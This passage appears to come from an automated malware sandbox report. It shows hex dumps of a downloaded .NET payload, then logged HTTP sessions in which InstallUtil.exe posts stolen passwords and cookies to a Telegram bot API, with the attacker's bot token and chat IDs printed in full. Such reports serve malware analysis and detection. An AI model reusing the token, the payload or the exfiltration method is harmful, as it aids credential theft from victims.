85 f0 65 4c 06
                                                      Data Ascii: 5>GZq4:,>(>Y."{Gr!T`>6BtX)At1)=IhZ.T,q?,SnRRL'Y&/b}r0yq8uV:r-,WzC%UcfXLO?!kjrUYuCTlL.=R8@aNeL
                                                      2022-05-14 13:17:17 UTC1067INData Raw: 22 be 58 c1 83 fb 90 0e bd a7 34 af 30 3a c4 2a 9e ce 73 65 de 78 ab 16 54 e2 ed 30 ec 1e ec 34 be 84 32 81 5b 01 ca 43 46 39 e7 f3 b7 4d 9a 2d 7a d9 a9 cc 16 9b 9d e2 e2 be fa ae be 78 60 2c f2 35 81 94 b0 f2 b8 ff d0 f7 49 2b c1 4a ec 52 b7 86 c9 47 6b bc 7b 1b ae 81 9c a6 b3 64 78 a8 5a 57 c9 b6 db 5d 58 b1 8e 32 67 3d 55 ce 15 ba cb eb 23 a4 ce b1 bd c0 8d 45 9d 73 91 51 ff ff b6 26 6c 5c a1 13 ee 92 52 e5 3a 0a c3 6f 7b 32 43 91 f7 8f da 56 c1 22 29 9c 1c 45 8f c6 50 79 00 1b 33 72 0e d0 c6 67 15 52 d6 a2 ec 17 f5 08 83 93 ae 34 46 64 38 8a c2 d8 a8 be 33 03 e9 9c 05 98 27 6a 17 5b 7a ab fa 53 94 4f 3b 6d 8c fe e9 96 3d 7e b0 01 a8 ba 77 fe 2d ec 59 5e 20 48 66 f2 db 38 b9 d0 7f fb de 17 4e 32 25 7b 1d b9 9e ea 39 b0 b1 b8 c3 6c 80 1f e8 d7 93 c0 7d
                                                      Data Ascii: "X40:*sexT042[CF9M-zx`,5I+JRGk{dxZW]X2g=U#EsQ&l\R:o{2CV")EPy3rgR4Fd83'j[zSO;m=~w-Y^ Hf8N2%{9l}
                                                      2022-05-14 13:17:17 UTC1074INData Raw: 2d 81 12 49 12 49 12 1d 2d 81 12 49 12 25 81 12 1d 81 12 49 12 1d 09 81 12 11 81 12 c5 81 12 15 81 12 11 81 12 1c 1d 0d 81 12 81 82 12 01 81 12 a1 80 12 fd 80 12 01 0f 1f 07 4c 29 81 11 06 04 1c 1d 0d 81 12 01 02 20 08 1c ed 80 12 02 07 06 9c 83 12 9c 83 12 05 1d 06 1d 9c 83 12 01 0f 06 07 11 0e 0e 02 39 12 15 0e 1d 01 0f 03 07 0c 02 01 07 03 49 12 0e 0e 1c 1d 01 0f 05 07 0a f1 80 12 01 07 05 f1 80 12 06 04 18 05 1d 02 07 05 4c 11 e4 80 12 18 03 07 08 4c 11 02 14 81 12 18 04 07 09 18 18 02 07 04 18 18 18 18 18 99 80 12 18 18 18 18 70 11 70 11 1d a9 80 12 95 80 12 d9 80 12 70 11 18 6c 11 18 5c 11 18 58 11 18 7c 81 11 18 09 18 18 74 11 18 d1 80 12 18 0e 01 0f 22 07 39 49 12 0e 0e 4c 11 4c 11 1c 1d 06 07 0c 84 82 12 29 12 29 12 80 82 12 05 1d 05 1d 18 7d 12
                                                      Data Ascii: -II-I%IL) 9ILLpppl\X|t"9ILL))}
                                                      2022-05-14 13:17:17 UTC1090INData Raw: 77 64 00 74 73 69 4c 65 74 75 62 69 72 74 74 41 70 6c 00 72 65 74 65 6d 61 72 61 50 00 73 73 65 72 64 64 41 74 72 61 74 53 00 74 69 6d 6d 6f 43 6b 63 61 74 53 00 64 65 76 72 65 73 65 52 6b 63 61 74 53 00 73 74 69 42 6f 72 65 5a 6b 63 61 74 53 00 64 65 64 6e 65 70 73 75 53 65 74 61 65 72 43 00 79 74 69 72 75 63 65 53 64 61 65 72 68 54 00 74 63 65 74 6f 72 50 32 33 6e 69 57 00 6e 6f 69 74 69 73 6f 70 73 69 44 74 69 72 65 68 6e 49 00 65 7a 69 53 77 65 69 56 00 74 65 73 66 66 4f 6e 6f 69 74 63 65 53 00 65 7a 69 53 74 69 6d 6d 6f 43 00 65 6c 64 6e 61 48 65 6c 69 46 00 73 65 74 75 62 69 72 74 74 41 6e 6f 69 74 61 63 6f 6c 6c 41 00 6e 6f 69 74 63 65 74 6f 72 50 65 67 61 50 6e 6f 69 74 63 65 53 00 65 7a 69 53 6d 75 6d 69 78 61 4d 00 65 6c 64 6e 61 48 6e 6f 69 74
                                                      Data Ascii: wdtsiLetubirttAplretemaraPsserddAtratStimmoCkcatSdevreseRkcatSstiBoreZkcatSdednepsuSetaerCytiruceSdaerhTtcetorP23niWnoitisopsiDtirehnIeziSweiVtesffOnoitceSeziStimmoCeldnaHeliFsetubirttAnoitacollAnoitcetorPegaPnoitceSeziSmumixaMeldnaHnoit
                                                      2022-05-14 13:17:17 UTC1106INData Raw: 00 1a 00 00 00 00 00 01 00 19 00 00 00 00 00 01 00 17 00 00 00 16 00 00 00 05 00 00 00 01 00 00 26 b7 00 06 00 08 19 51 09 41 09 93 08 8c 19 df 08 87 1c 86 08 83 1b f3 08 51 09 79 08 4e 1b f3 08 39 19 df 07 fd 12 51 07 c7 19 df 07 4b 09 44 07 08 19 df 06 e5 09 37 06 b8 09 34 06 b6 08 56 06 b4 19 51 06 9f 09 2a 06 98 09 22 06 66 08 56 04 84 12 51 00 0d 12 51 00 09 25 7b 07 83 9a 61 25 68 07 83 9a 21 00 1f 07 7b 95 81 00 1f 07 7b 95 61 00 1f 07 7b 95 41 00 1f 07 7b 95 21 00 1f 07 7b 94 e1 00 1f 07 7b 94 c1 00 1f 07 7b 94 a1 25 57 07 7b 94 61 25 46 07 7b 94 41 25 35 07 7b 94 21 25 24 07 7b 94 01 25 13 07 7b 93 e1 08 e3 07 73 92 21 00 1f 07 53 92 21 08 e3 07 73 91 e1 00 1f 07 53 91 e1 08 e3 07 73 91 c1 00 1f 07 53 91 c1 08 e3 07 73 91 a1 00 1f 07 53 91 a1 08
                                                      Data Ascii: &QAQyN9QKD74VQ*"fVQQ%{a%h!{{a{A{!{{{%W{a%F{A%5{!%${%{s!S!sSsSsS
                                                      2022-05-14 13:17:17 UTC1122INData Raw: 00 03 00 00 31 79 00 02 00 00 31 64 00 01 00 00 30 aa 00 06 00 00 30 a1 00 05 00 00 31 cb 00 04 00 00 31 79 00 03 00 00 31 64 00 02 00 00 31 56 00 01 00 00 31 cb 00 04 00 00 31 79 00 03 00 00 31 64 00 02 00 00 31 56 00 01 00 00 00 a6 00 02 00 00 00 a4 00 01 00 00 30 bb 00 04 00 00 31 c0 00 03 00 00 31 79 00 02 00 00 31 64 00 01 00 00 30 aa 00 07 00 00 30 a1 00 06 00 00 31 c0 00 05 00 00 31 b5 00 04 00 00 31 79 00 03 00 00 31 64 00 02 00 00 31 56 00 01 00 00 31 c0 00 05 00 00 31 b5 00 04 00 00 31 79 00 03 00 00 31 64 00 02 00 00 31 56 00 01 00 00 00 a6 00 02 00 00 00 a4 00 01 00 00 30 bb 00 02 00 00 31 a8 00 01 00 00 30 aa 00 07 00 00 30 a1 00 06 00 00 31 a8 00 05 00 00 31 9b 00 04 00 00 24 af 00 03 00 00 31 64 00 02 00 00 31 56 00 01 00 00 31 a8 00 05 00
                                                      Data Ascii: 1y1d0011y1d1V11y1d1V011y1d00111y1d1V111y1d1V010011$1d1V1
                                                      2022-05-14 13:17:18 UTC1138INData Raw: 00 00 00 a1 13 04 30 7a 01 c6 00 03 00 00 00 00 00 9c 13 ad 28 e3 01 c6 00 03 00 00 00 00 00 9a 12 43 30 55 18 86 00 03 00 00 00 00 00 97 13 a1 30 b1 01 c6 00 03 00 00 00 00 00 8f 12 dd 30 7a 01 c6 00 03 00 00 00 00 00 89 13 94 28 e3 01 c6 00 03 00 00 00 00 00 87 12 43 30 55 18 86 00 03 00 00 00 00 00 83 13 82 30 b1 01 c6 00 03 00 00 00 00 00 7d 13 6b 30 7a 01 c6 00 03 00 00 00 00 00 79 13 59 28 e3 01 c6 00 03 00 00 00 00 00 77 12 43 30 55 18 86 00 03 00 00 00 00 00 77 0c 28 30 55 18 86 00 00 00 00 21 d0 00 77 0c 28 30 55 18 86 00 00 00 00 21 c4 00 77 0c 28 30 55 18 86 00 00 00 00 21 b8 00 77 0b d5 30 4e 18 91 00 00 00 00 21 00 00 77 0c 1f 00 36 08 83 00 00 00 00 20 d0 00 77 0b de 00 36 08 83 00 00 00 00 20 94 00 74 12 ef 30 b1 01 c6 00 03 00 00 00 00 00
                                                      Data Ascii: 0z(C0U00z(C0U0}k0zyY(wC0Uw(0U!w(0U!w(0U!w0N!w6 w6 t0
                                                      2022-05-14 13:17:18 UTC1154INData Raw: 00 01 00 09 00 00 00 36 00 00 01 05 00 05 00 01 00 0d 00 00 00 36 00 10 01 0d 00 04 00 01 00 05 00 36 00 65 00 10 00 00 00 03 00 01 00 05 00 51 00 36 00 10 00 00 00 02 00 01 00 05 00 38 00 36 00 10 00 00 00 01 00 01 00 00 00 00 00 2d 00 00 00 00 1f 7e 46 14 00 06 1f 7e 45 fc 00 06 27 3e 45 bd 00 06 1f 7e 45 75 00 06 00 4a 45 40 00 06 1f 7e 45 21 00 06 1f 5a 44 db 00 06 00 00 44 d0 00 3b 00 4a 44 90 00 06 00 4a 44 2b 00 06 01 58 44 15 00 06 00 4a 43 fd 00 06 01 58 43 eb 00 06 01 58 43 d7 00 06 01 58 43 9f 00 06 41 56 43 94 00 0a 21 82 43 71 00 1e 00 4a 43 4a 00 06 3f 7e 43 0a 00 1a 21 82 43 06 00 06 21 82 42 ed 00 06 1f 5a 42 dd 00 06 00 4a 42 c1 00 06 40 36 42 b2 00 0a 1f 5a 42 a4 00 06 21 82 42 82 00 06 00 4a 42 5c 00 06 27 3e 42 05 00 06 3d 0b 41 df 00
                                                      Data Ascii: 666eQ686-~F~E'>E~EuJE@~E!ZDD;JDJD+XDJCXCXCXCAVC!CqJCJ?~C!C!BZBJB@6BZB!BJB\'>B=A
                                                      2022-05-14 13:17:18 UTC1170INData Raw: f7 2b 02 2a 04 00 04 73 7b 06 2b 2e 00 00 00 f4 2b 03 f5 2b 02 2a 04 00 04 72 7d 09 2b 08 2b 42 f7 2b 02 2a 04 00 04 72 7b 06 2b 2e 00 00 00 f4 2b 03 f5 2b 02 2a 04 00 04 71 7d 09 2b 08 2b 42 f7 2b 02 2a 04 00 04 71 7b 06 2b 2e 00 00 00 f4 2b 03 f5 2b 02 2a 04 00 04 70 7d 09 2b 08 2b 42 f7 2b 02 2a 04 00 04 70 7b 06 2b 2e 00 00 00 f4 2b 03 f5 2b 02 2a 04 00 04 6f 7d 09 2b 08 2b 42 f7 2b 02 2a 04 00 04 6f 7b 06 2b 2e 00 00 00 2a 00 06 00 02 29 28 02 22 00 00 00 f4 2b 03 f5 2b 02 2a 04 00 04 6e 7d 09 2b 08 2b 42 f7 2b 02 2a 04 00 04 6e 7b 06 2b 2e 00 00 00 f4 2b 03 f5 2b 02 2a 04 00 04 6d 7d 09 2b 08 2b 42 f7 2b 02 2a 04 00 04 6d 7b 06 2b 2e 00 00 00 f4 2b 03 f5 2b 02 2a 04 00 04 6c 7d 09 2b 08 2b 42 f7 2b 02 2a 04 00 04 6c 7b 06 2b 2e 00 00 00 f4 2b 03 f5
                                                      Data Ascii: +*s{+.++*r}++B+*r{+.++*q}++B+*q{+.++*p}++B+*p{+.++*o}++B+*o{+.*)("++*n}++B+*n{+.++*m}++B+*m{+.++*l}++B+*l{+.+
                                                      2022-05-14 13:17:18 UTC1186INData Raw: 00 de 00 00 26 ee 2b 06 00 03 02 28 f3 2b 06 00 03 1d 28 13 de 00 0b 0b 2b 06 2b 04 00 05 bf 7e 04 00 05 92 7e 00 00 00 de 00 01 2c 1a 00 26 e9 2b 0a ea 2b 06 00 03 02 28 ef 2b 06 00 03 1d 28 19 de 00 ec 2c 1b 14 2b 0f 2b 0a 2b 04 00 05 be 7e 04 00 05 92 7e 00 00 00 01 14 38 00 00 01 0f 38 06 66 c1 49 20 04 00 04 56 7e 00 00 01 18 38 00 00 01 13 38 06 66 c1 49 20 04 00 04 56 7e 00 11 00 00 5a 00 00 01 43 00 04 30 1b 00 00 00 ff ff ff 2a 38 06 00 02 9d 28 ff ff ff 25 38 0d ff ff ff 26 38 06 00 02 9d 28 ff ff ff 21 38 0b ff ff ff 1c 38 02 ff ff ff 14 38 04 ff ff ff 0c 38 05 ff ff ff 05 38 03 ff ff fe fa 38 0a 2a 7a 0a 00 01 08 73 06 00 02 9d 28 06 66 b7 a2 20 04 00 04 56 7e 00 16 2c 46 58 18 06 52 03 fe 16 08 58 18 06 7a 0a 00 01 08 73 06 00 02 9d 28 06 66
                                                      Data Ascii: &+(+(++~~,&++(+(,+++~~88fI V~88fI V~ZC0*8(%8&8(!888888*zs(f V~,FXRXzs(f
                                                      2022-05-14 13:17:18 UTC1202INData Raw: 7e 00 16 2c 46 58 1c 06 52 01 fe c0 00 00 45 20 08 58 1c 06 7a 0a 00 01 08 73 06 00 02 9d 28 06 66 b6 ae 20 04 00 04 56 7e 00 16 2c 46 58 1b 06 52 01 fe c0 00 00 08 20 08 58 1b 06 7a 0a 00 01 08 73 06 00 02 9d 28 06 66 b6 e3 20 04 00 04 56 7e 00 16 2c 46 58 1a 06 52 01 fe c0 00 00 9a 20 08 58 1a 06 7a 0a 00 01 08 73 06 00 02 9d 28 06 66 b7 38 20 04 00 04 56 7e 00 16 2c 46 58 19 06 52 01 fe c0 00 00 18 20 08 58 19 06 7a 0a 00 01 08 73 06 00 02 9d 28 06 66 b9 8d 20 04 00 04 56 7e 00 16 2c 46 58 18 06 52 01 fe c0 00 01 2d 20 08 58 18 06 7a 0a 00 01 08 73 06 00 02 9d 28 06 66 b9 d2 20 04 00 04 56 7e 00 16 2c 46 58 17 06 52 01 fe c0 00 00 21 20 08 58 17 06 7a 0a 00 01 2b 73 06 00 02 9d 28 06 66 bc 23 20 04 00 04 56 7e 00 16 2c 46 06 52 01 fe c0 00 00 22 20 08
                                                      Data Ascii: ~,FXRE Xzs(f V~,FXR Xzs(f V~,FXR Xzs(f8 V~,FXR Xzs(f V~,FXR- Xzs(f V~,FXR! Xz+s(f# V~,FR"
                                                      2022-05-14 13:17:18 UTC1218INData Raw: 0e 11 04 00 06 08 7e 00 06 00 03 8f 28 0a 00 01 16 7e 0e 11 04 00 06 08 7e 00 06 00 03 98 28 4a 06 0a 00 01 15 7e 0e 11 04 00 06 0e 7e 93 2d 46 58 0c 1f 06 52 04 fe 00 00 32 c8 20 4a 58 1a 06 58 0c 1f 06 54 58 17 4a 58 1a 06 58 1a 06 00 00 06 00 03 8f 28 0a 00 01 18 7e 0e 11 04 00 06 08 7e 00 06 00 03 8f 28 0a 00 01 17 7e 0e 11 04 00 06 08 7e 00 06 00 03 8f 28 0a 00 01 16 7e 0e 11 04 00 06 08 7e 00 06 00 03 98 28 4a 06 0a 00 01 15 7e 0e 11 04 00 06 0e 7e 00 56 2b 54 16 58 1a 06 00 ff ff fe 6c 3a 16 06 00 03 8f 28 0a 00 01 0e 7e 0e 11 04 00 06 08 7e 26 06 00 03 95 28 06 00 02 cc 28 01 00 00 99 d0 04 00 05 65 7e 0e 11 04 00 06 0c 7e 0e 13 06 00 03 8c 28 0d 11 04 00 06 06 7e 0d 13 06 00 03 89 28 11 11 06 00 02 cc 28 01 00 00 99 d0 04 00 05 65 7e 16 1f 06 00
                                                      Data Ascii: ~(~~(J~~-FXR2 JXXTXJXX(~~(~~(~~(J~~V+TXl:(~~&((e~~(~((e~


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      5192.168.2.349785149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:17:47 UTC1230OUTPOST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da35bce6fc6661
                                                      Host: api.telegram.org
                                                      Content-Length: 1020
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      2022-05-14 13:17:47 UTC1231INHTTP/1.1 100 Continue
                                                      2022-05-14 13:17:47 UTC1231OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 36 66 63 36 36 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 38 38 32 37 36 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 36 66 63 36 36 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 37 38 33 38 37 35 0a 4f 53 46 75 6c 6c
                                                      Data Ascii: -----------------------------8da35bce6fc6661Content-Disposition: form-data; name="chat_id"5388276304-----------------------------8da35bce6fc6661Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/783875OSFull
                                                      2022-05-14 13:17:48 UTC1232INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 13:17:48 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 636
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":486,"from":{"id":5351864471,"is_bot":true,"first_name":"Maryland","username":"marymekbot"},"chat":{"id":5388276304,"first_name":"Mary","last_name":"Bethel","username":"marybethel59","type":"private"},"date":1652534268,"document":{"file_name":"user-783875 2022-05-14 03-17-47.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIB5mJ_q_yvUxG7pIihA-4OGQtaK9UzAAJyDAAC5M8AAVC1Vu-ytzT4BiQE","file_unique_id":"AgADcgwAAuTPAAFQ","file_size":450},"caption":"New PW Recovered!\n\nUser Name: user/783875\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      6192.168.2.349786149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:17:48 UTC1233OUTPOST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da35bce7a34abc
                                                      Host: api.telegram.org
                                                      Content-Length: 1895
                                                      Expect: 100-continue
                                                      2022-05-14 13:17:48 UTC1233INHTTP/1.1 100 Continue
                                                      2022-05-14 13:17:48 UTC1233OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 37 61 33 34 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 38 38 32 37 36 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 37 61 33 34 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 37 38 33 38 37 35 0a 4f 53
                                                      Data Ascii: -----------------------------8da35bce7a34abcContent-Disposition: form-data; name="chat_id"5388276304-----------------------------8da35bce7a34abcContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/783875OS
                                                      2022-05-14 13:17:48 UTC1234OUTData Raw: 1a 43 6a ef 66 e7 7d 47 8d 18 a4 7a ce 54 89 4c d5 14 c9 2c 50 b3 3e 98 8c 45 3a 93 12 ae 7e 30 61 41 6c cf 51 10 db 53 10 08 d4 38 8b bd 61 1f 87 b4 6c 2f d9 43 77 a5 ad 66 65 25 c7 f4 99 b4 9c 5f 0a b2 98 7f 28 da c9 95 78 3d 1e 6e b8 6e 66 15 65 08 53 ec e8 f8 cb fa b1 73 aa ed 95 11 ed 88 b5 bf 1a 8e b7 be 12 2e e8 58 be 3b 1b e3 91 0d e1 78 17 5e 2f 75 05 f1 fd 61 28 a8 1e a8 72 14 7b 43 9e f9 ba 65 b7 20 8b f6 d5 de db 2f b2 d7 b7 db 8a bc f0 15 12 7e 15 2e 59 37 00 00 00 00 00 00 00 00 00 3c 95 56 f0 7c a8 7c e6 bc 46 d5 33 86 c2 b4 9e 34 91 07 ed 43 17 3d 2b 36 3c e3 e0 7d e5 0f 53 65 1c ef 2f cf 64 14 43 a6 4c 61 39 5a 23 2e 46 f6 fe 7f 12 09 93 c2 0d e1 ca bf fd 5f 00 00 00 00 00 00 00 00 00 b0 20 1f 1f e2 e6 39 05 e0 97 f0 3e 2e ff ec 28 e5 fd
                                                      Data Ascii: Cjf}GzTL,P>E:~0aAlQS8al/Cwfe%_(x=nnfeSs.X;x^/ua(r{Ce /~.Y7<V||F34C=+6<}Se/dCLa9Z#.F_ 9>.(
                                                      2022-05-14 13:17:48 UTC1235INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 13:17:48 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 646
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":487,"from":{"id":5351864471,"is_bot":true,"first_name":"Maryland","username":"marymekbot"},"chat":{"id":5388276304,"first_name":"Mary","last_name":"Bethel","username":"marybethel59","type":"private"},"date":1652534268,"document":{"file_name":"user-783875 2022-05-14 03-17-48.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIB52J_q_zPwR3731jXxkwCLPNXPjKrAAJzDAAC5M8AAVAxu5_yg-YEYSQE","file_unique_id":"AgADcwwAAuTPAAFQ","file_size":1316},"caption":"New Cookie Recovered!\n\nUser Name: user/783875\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      7192.168.2.349789149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:17:54 UTC1236OUTPOST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da35bceb536d8f
                                                      Host: api.telegram.org
                                                      Content-Length: 1020
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      2022-05-14 13:17:54 UTC1236INHTTP/1.1 100 Continue
                                                      2022-05-14 13:17:54 UTC1236OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 62 35 33 36 64 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 38 38 32 37 36 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 62 35 33 36 64 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 37 38 33 38 37 35 0a 4f 53 46 75 6c 6c
                                                      Data Ascii: -----------------------------8da35bceb536d8fContent-Disposition: form-data; name="chat_id"5388276304-----------------------------8da35bceb536d8fContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/783875OSFull
                                                      2022-05-14 13:17:54 UTC1237INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 13:17:54 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 636
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":488,"from":{"id":5351864471,"is_bot":true,"first_name":"Maryland","username":"marymekbot"},"chat":{"id":5388276304,"first_name":"Mary","last_name":"Bethel","username":"marybethel59","type":"private"},"date":1652534274,"document":{"file_name":"user-783875 2022-05-14 03-17-54.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIB6GJ_rAJ6SIij8zpu_djOheqOoxRMAAJ0DAAC5M8AAVCA6Cm93KDc4iQE","file_unique_id":"AgADdAwAAuTPAAFQ","file_size":450},"caption":"New PW Recovered!\n\nUser Name: user/783875\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      8192.168.2.349790149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:17:54 UTC1238OUTPOST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da35bceb87e14b
                                                      Host: api.telegram.org
                                                      Content-Length: 1895
                                                      Expect: 100-continue
                                                      2022-05-14 13:17:54 UTC1238INHTTP/1.1 100 Continue
                                                      2022-05-14 13:17:54 UTC1238OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 62 38 37 65 31 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 38 38 32 37 36 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 63 65 62 38 37 65 31 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 37 38 33 38 37 35 0a 4f 53
                                                      Data Ascii: -----------------------------8da35bceb87e14bContent-Disposition: form-data; name="chat_id"5388276304-----------------------------8da35bceb87e14bContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/783875OS
